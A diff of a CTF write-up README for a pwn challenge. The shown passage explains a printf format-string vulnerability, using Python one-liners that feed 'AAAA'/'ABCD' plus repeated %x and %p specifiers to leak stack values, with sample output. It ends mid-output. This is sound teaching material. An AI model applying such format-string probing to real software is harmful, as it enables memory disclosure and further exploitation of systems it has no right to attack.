neuronflicker/CTF/UCF/Pwn_LogMeIn/README.md

 > Note also: We actually get a warning about the format exploit.

-When we run it (passing in AAAA followed by 20 `%x` formatters (meaning "print hex values")), as there are no actual arguments to `printf()` in the code, it goes and gets its arguments from the stack to fill the formats.
+When we run it (passing in AAAA followed by 20 `%x` formatters), as there are no actual arguments to `printf()` in the code, it goes and gets its arguments from the stack to fill the formats.
 You can see that the 8th hex value returned is 0x41414141, which are the 4 'A's (0x41 in ASCII) we started the string with.
-This is followed by our %x characters, though they seem to be in an odd order and missing some bits.
+This is followed by our %x (0x25, 0x78 and 0x20 for the space) characters, though they seem to be in an odd order and missing some bits.
 This is because `%x` is only showing the least-significant 32-bits.
 If we use `%p`, this shows the full 64-bit values and we see:
 ```
 > python -c "print ('AAAA ' + '%p '*20)" | ./test_p
 You entered: AAAA 0x1621020 0x7f9a67ab9780 0xd 0x7f9a67cc7700 0xd 0x7ffde8020238 0x100000000 0x2070252041414141 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0xa20 (nil) 0x400650 0x400500 0x7ffde8020230
 ```
-Here you can see the bytes are reversed - our 0x41414141 is displayed in the least-significant bytes of the 8th value, and it has the first part of the `%x`s in the most-significant bytes.
+Here you can see the bytes are reversed - our 0x41414141 is displayed in the least-significant bytes of the 8th value, and it has the first part of the `%x`s from our input in the most-significant bytes.
 This is clearer if we use ABCD instead of AAAA:
 ```
 > python -c "print ('ABCD ' + '%p '*20)" | ./test_p
 You entered: ABCD 0x2514020 0x7f8e3e020780 0xd 0x7f8e3e22e700 0xd 0x7fff26cca578 0x100000000 0x2070252044434241 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0xa20 (nil) 0x400650 0x400500 0x7fff26cca570